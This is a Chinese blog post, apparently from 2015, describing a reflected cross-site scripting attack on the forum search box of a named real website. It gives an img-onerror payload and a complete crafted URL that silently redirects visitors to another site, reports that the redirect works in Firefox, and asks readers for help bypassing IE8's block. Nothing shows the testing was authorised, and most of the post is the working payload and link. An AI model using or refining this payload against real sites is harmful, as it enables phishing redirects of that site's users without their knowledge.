前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >xss渗透试验(3)

xss渗透试验(3)

作者头像
血狼debugeeker
发布2018-09-20 14:46:27
5030
发布2018-09-20 14:46:27
举报
文章被收录于专栏:debugeeker的专栏

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://cloud.tencent.com/developer/article/1344562

工具:appscan

站点:www.talk915.com

浏览器:IE8,firefox

方法:<img> onerror方法

浏览器不能够直接执行,这种通过第二次点击来实现渗透,效率非常低,最好是给出一个url,本来以为是进入talk915的,却自动跳转到另外一个网站。

应该怎么做呢?其中在本例中,我们用得最多的标签的就是<a>, <img>,我们到www.w3school.com.cn看一下它们的手册,发现<img>的onerror对象句柄没有使用。

http://www.w3school.com.cn/jsref/dom_obj_image.asp

假如,我们在

http://www.talk915.com/forum/forum_community.action

的搜索框里填入

1234"><img src=@onerror=window.location.assign("http://www.bing.com")>

结果会怎样?

因为<img>引用src的位置@,是不存在,按照手册来说,它会执行onerror这一段。也就是把浏览器地址栏输入

http://www.bing.com

用IE8,firefox来尝试,都能够跳转到bing

拼接url:

http://www.talk915.com/forum/forum_community.action?struts.token.name=token&token=G2TQIXRNK8P5ZD8YNR6A2YHST2P0JU7W&title=&author=&content=&titles=&titleType=&forumId=&orderBy=&excellent=&selectTitle=&page.currentPage=1&postForumId=&postContent=&postAdd=&postId=&oldForumId=&openPost=&postAudio=&postAudioLength=&postStatus=&img_url_length=64&expression_url_length=46&upload_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsUpload&download_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsDownload%3FFILE_ID%3D&pathUrl=http%3A%2F%2Fwww.talk915.com%3A80%2F&userToken=&searchWhere=1234%22%3e%3cimg+src%3d%40+onerror%3dwindow.location.assign(%22http%3a%2f%2fwww.bing.com%22)%3e&forumListId=4&selectForumId=1&postTitle=1234(http://www.talk915.com/forum/forum_community.action?struts.token.name=token&token=G2TQIXRNK8P5ZD8YNR6A2YHST2P0JU7W&title=&author=&content=&titles=&titleType=&forumId=&orderBy=&excellent=&selectTitle=&page.currentPage=1&postForumId=&postContent=&postAdd=&postId=&oldForumId=&openPost=&postAudio=&postAudioLength=&postStatus=&img_url_length=64&expression_url_length=46&upload_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsUpload&download_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsDownload%3FFILE_ID%3D&pathUrl=http%3A%2F%2Fwww.talk915.com%3A80%2F&userToken=&searchWhere=1234%22%3E%3Cimg+src%3D%40+onerror%3Dwindow.location.assign(%22http%3A%2F%2Fwww.bing.com%22%29%3E&forumListId=4&selectForumId=1&postTitle=1234)

但IE8仍然会报错无法跳转,firefox没问题。

希望牛人帮忙看看怎么突破IE8这个报错。谢谢。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2015年01月13日,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档